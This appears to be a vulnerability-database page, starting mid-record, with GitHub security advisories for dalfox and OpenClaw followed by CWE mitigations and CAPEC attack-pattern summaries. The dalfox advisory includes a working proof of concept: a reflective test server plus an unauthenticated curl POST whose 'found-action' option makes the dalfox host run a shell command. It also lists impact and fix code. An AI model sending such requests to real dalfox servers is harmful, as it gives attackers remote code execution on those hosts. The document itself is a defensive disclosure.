model.Options, target, query, ptype string) {\n    afterCmd := options.FoundAction\n    afterCmd = strings.ReplaceAll(afterCmd, \"@@query@@\", query)\n    afterCmd = strings.ReplaceAll(afterCmd, \"@@target@@\", target)\n    afterCmd = strings.ReplaceAll(afterCmd, \"@@type@@\", ptype)\n    cmd := exec.Command(options.FoundActionShell, \"-c\", afterCmd)\n    err := cmd.Run()\n    ...\n}\n```\n\nBecause the attacker supplies both the scan target URL and `found-action`, they trivially guarantee that a finding is produced (by hosting a one-line reflective server) and that the shell command is executed.\n\n## Proof of Concept\n\n```bash\n# Step 1 \u2014 Start a reflective XSS target (attacker-controlled)\npython3 - \u003c\u003c\u0027PY\u0027\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib.parse import urlparse, parse_qs\nclass H(BaseHTTPRequestHandler):\n    def do_GET(self):\n        q = parse_qs(urlparse(self.path).query).get(\u0027q\u0027, [\u0027\u0027])[0]\n        body = f\u0027\u003chtml\u003e\u003cbody\u003e{q}\u003c/body\u003e\u003c/html\u003e\u0027.encode()\n        self.send_response(200)\n        self.send_header(\u0027Content-Type\u0027, \u0027text/html\u0027)\n        self.send_header(\u0027Content-Length\u0027, str(len(body)))\n        self.end_headers()\n        self.wfile.write(body)\n    def log_message(self, *a): pass\nHTTPServer((\u0027127.0.0.1\u0027, 18081), H).serve_forever()\nPY\n\n# Step 2 \u2014 Start dalfox in REST server mode (default: 0.0.0.0:6664, no API key)\ngo run . server --host 127.0.0.1 --port 16664 --type rest\n\n# Step 3 \u2014 POST unauthenticated scan request with found-action payload\ncurl -s -X POST http://127.0.0.1:16664/scan \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data \u0027{\n    \"url\": \"http://127.0.0.1:18081/?q=test\",\n    \"options\": {\n      \"found-action\": \"echo owned \u003e/tmp/dalfox_rce_marker\",\n      \"found-action-shell\": \"bash\",\n      \"use-headless\": false,\n      \"worker\": 1,\n      \"limit-result\": 1\n    }\n  }\u0027\n\n# Step 4 \u2014 Confirm arbitrary command executed on the dalfox host\ncat /tmp/dalfox_rce_marker\n# Expected output: owned\n```\n\nNo `X-API-KEY` header is required. The reflective server ensures dalfox finds a vulnerability, which triggers `foundAction`.\n\n## Impact\n\n- **Unauthenticated remote code execution** on any host running `dalfox server` in its default configuration.\n- Full read access to secrets, configuration files, and credentials visible to the dalfox process.\n- Arbitrary file writes: persistence, backdoor installation, data exfiltration staging.\n- Lateral movement using the dalfox host\u0027s network position and credentials.\n- The default `0.0.0.0` bind address means exposure to all network interfaces, including public-facing ones in misconfigured cloud environments.\n\n## Recommended Remediation\n\n### Option 1: Require API key \u2014 make `--api-key` mandatory (preferred)\n\nReject server startup when no API key is provided and emit a loud warning. This is the lowest-risk fix because it protects all current and future routes without code changes to the scan path.\n\n```go\n// cmd/server.go \u2014 in runServerCmd, before starting the server:\nif serverType == \"rest\" \u0026\u0026 apiKey == \"\" {\n    fmt.Fprintln(os.Stderr, \"ERROR: --api-key is required when running in REST server mode.\")\n    fmt.Fprintln(os.Stderr, \"       Generate a key with: openssl rand -hex 32\")\n    os.Exit(1)\n}\n```\n\n### Option 2: Strip `FoundAction` / `FoundActionShell` from API-sourced requests\n\nPrevent untrusted callers from setting execution-control options regardless of auth state. This adds defence-in-depth and protects authenticated deployments against credential theft.\n\n```go\n// pkg/server/server.go \u2014 in postScanHandler, before calling ScanFromAPI:\nrq.Options.FoundAction = \"\"\nrq.Options.FoundActionShell = \"\"\n```\n\nBoth options should be applied together. Option 1 prevents unauthenticated access; Option 2 ensures that even authenticated callers (who may be external consumers of the REST API) cannot trigger host-level command execution.\n\n##Credit\n\nEmmanuel David\n\nGithub:- https://github.com/drmingler",
  "id": "GHSA-v25v-m36w-jp4h",
  "modified": "2026-06-08T23:50:00Z",
  "published": "2026-05-12T15:07:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hahwul/dalfox/security/advisories/GHSA-v25v-m36w-jp4h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45087"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hahwul/dalfox"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hahwul/dalfox/releases/tag/v2.13.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dalfox Server Mode Vulnerable to Unauthenticated Remote Code Execution via `found-action`"
}

GHSA-VFW7-6RHC-6XXG

Vulnerability from github – Published: 2026-04-07 18:10 – Updated: 2026-05-06 02:39
VLAI
Summary
OpenClaw Has Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config
Details

Summary

Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config

Current Maintainer Triage

  • Status: open
  • Normalized severity: high
  • Assessment: Real shipped malicious-workspace-config env injection in the CLI backend runner, fixed by sanitizing backend env before spawn and shipped in v2026.3.24, so advisory stays open until published.

Affected Packages / Versions

  • Package: openclaw (npm)
  • Latest published npm version: 2026.3.31
  • Vulnerable version range: <=2026.3.23-2
  • Patched versions: >= 2026.3.24
  • First stable tag containing the fix: v2026.3.24

Fix Commit(s)

  • c2fb7f1948c3226732a630256b5179a60664ec24 — 2026-03-24T12:58:10-07:00

Release Process Note

  • The fix is already present in released version 2026.3.24.
  • This draft looks ready for final maintainer disposition or publication, not additional code-fix work.

Thanks @YLChen-007 for reporting.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2026.3.23-2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.3.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41384"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-15",
      "CWE-426"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-07T18:10:52Z",
    "nvd_published_at": "2026-04-28T19:37:41Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nIncomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real shipped malicious-workspace-config env injection in the CLI backend runner, fixed by sanitizing backend env before spawn and shipped in v2026.3.24, so advisory stays open until published.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `\u003c=2026.3.23-2`\n- Patched versions: `\u003e= 2026.3.24`\n- First stable tag containing the fix: `v2026.3.24`\n\n## Fix Commit(s)\n- `c2fb7f1948c3226732a630256b5179a60664ec24` \u2014 2026-03-24T12:58:10-07:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.24`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @YLChen-007 for reporting.",
  "id": "GHSA-vfw7-6rhc-6xxg",
  "modified": "2026-05-06T02:39:16Z",
  "published": "2026-04-07T18:10:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfw7-6rhc-6xxg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41384"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/c2fb7f1948c3226732a630256b5179a60664ec24"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-config-in-cli-backend"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw Has Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config"
}

Mitigation MIT-46
Architecture and Design

Strategy: Separation of Privilege

  • Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
  • Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
Mitigation
Implementation Architecture and Design

Because setting manipulation covers a diverse set of functions, any attempt at illustrating it will inevitably be incomplete. Rather than searching for a tight-knit relationship between the functions addressed in the setting manipulation category, take a step back and consider the sorts of system values that an attacker should not be allowed to control.

Mitigation
Implementation Architecture and Design

In general, do not allow user-provided or otherwise untrusted data to control sensitive values. The leverage that an attacker gains by controlling these values is not always immediately obvious, but do not underestimate the creativity of the attacker.

CAPEC-13: Subverting Environment Variable Values

The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.

CAPEC-146: XML Schema Poisoning

An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema.

CAPEC-176: Configuration/Environment Manipulation

An attacker manipulates files or settings external to a target application which affect the behavior of that application. For example, many applications use external configuration files and libraries - modification of these entities or otherwise affecting the application's ability to use them would constitute a configuration/environment manipulation attack.

CAPEC-203: Manipulate Registry Information

An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.

CAPEC-270: Modification of Registry Run Keys

An adversary adds a new entry to the "run keys" in the Windows registry so that an application of their choosing is executed when a user logs in. In this way, the adversary can get their executable to operate and run on the target system with the authorized user's level of permissions. This attack is a good way for an adversary to run persistent spyware on a user's machine, such as a keylogger.

CAPEC-271: Schema Poisoning

An adversary corrupts or modifies the content of a schema for the purpose of undermining the security of the target. Schemas provide the structure and content definitions for resources used by an application. By replacing or modifying a schema, the adversary can affect how the application handles or interprets a resource, often leading to possible denial of service, entering into an unexpected state, or recording incomplete data.

CAPEC-579: Replace Winlogon Helper DLL

Winlogon is a part of Windows that performs logon actions. In Windows systems prior to Windows Vista, a registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup.

CAPEC-69: Target Programs with Elevated Privileges

This attack targets programs running with elevated privileges. The adversary tries to leverage a vulnerability in the running program and get arbitrary code to execute with elevated privileges.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.